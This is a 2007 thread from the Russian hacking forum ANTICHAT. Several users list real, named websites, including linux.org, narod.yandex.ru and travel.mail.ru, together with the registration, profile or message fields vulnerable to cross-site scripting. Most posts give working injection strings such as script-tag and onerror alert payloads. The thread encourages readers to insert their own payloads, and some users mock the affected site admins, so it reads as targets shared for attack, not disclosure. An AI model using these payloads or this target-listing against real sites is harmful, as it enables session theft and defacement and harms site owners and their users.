HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.05.2007, 05:15
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию

ыыыы, какой красивый домен mydak.ru
http://www.mydak.ru/today.php
Думаю сами знаете что и куда вствлять...
на мои хек алерты не обращайте внимания =)
 
Ответить с цитированием

  #2  
Старый 20.05.2007, 09:21
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
С нами: 10245582

Репутация: 137
По умолчанию

http://dash.ru/
При регистрации указываем маил :
Цитата:
your@mail.ru"><script>alert()</script>.
На мыло приходит ссылка для активации.
http://dash.ru/user/?menu=setup
При просмотре профиля или настроек вылезат алерт.
 
Ответить с цитированием

  #3  
Старый 20.05.2007, 17:40
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию

ll.oo.lv
Регистрация, изменение профиля....
Уязвимы все поля...
Активная xss при просмотре профиля http://ll.oo.lv/?do=prof&user=SnooPI
такой вот хек =)
 
Ответить с цитированием

  #4  
Старый 20.05.2007, 21:03
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

zgrk.com.ua

пишем в теле письма
Код:
<img src='' onerror=alert(666)>
 
Ответить с цитированием

  #5  
Старый 29.05.2007, 23:19
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

travel.mail.ru

Наводим мышкой на рисунОК


Код:
http://travel.mail.ru/account_photos_popup.php?account_id=4163847
БуГагага..уже закрыли........10 часов жилаа...ххехехех))) ПРЕВЕД АДМИНАМ МАЙЛА...

Последний раз редактировалось DimOnOID; 30.05.2007 в 19:15..
 
Ответить с цитированием

  #6  
Старый 13.06.2007, 19:58
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
Wink

chatcity.ru

Ну вообщем то........вроде чаты на chatcity


Поля:
E-mail
web-страничка

Вот один пример на volchat.ru
Код:
http://volchat.ru/people/pp0.cgi?c=13397&cn=trane___
 
Ответить с цитированием

  #7  
Старый 25.05.2007, 21:28
XenOtai
Познающий
Регистрация: 30.12.2006
Сообщений: 32
С нами: 10190624

Репутация: 68
По умолчанию

Цитата:
http://www.linux.org/user/register.html

Уязвимы поля First Name и Last Name.

Пример запроса: '><script>alert('Hacked%20by%20XenOtai')</script>
 
Ответить с цитированием

  #8  
Старый 14.06.2007, 13:55
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

narod.yandex.ru

Пишем письмо в сообщество, уязвимо поле "Ваш сайт:"

<script>alert('123');</script>

Последний раз редактировалось freddi; 16.06.2007 в 23:29..
 
Ответить с цитированием

  #9  
Старый 16.06.2007, 23:26
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

nm.ru

прикрепляем к письму файл txt или pdf со скриптом.
 
Ответить с цитированием

  #10  
Старый 17.06.2007, 17:45
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

www.xyligan.ru

уязвимо поле "имя"))))

зы это из компании Хакера
ззы пассивных там полно.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.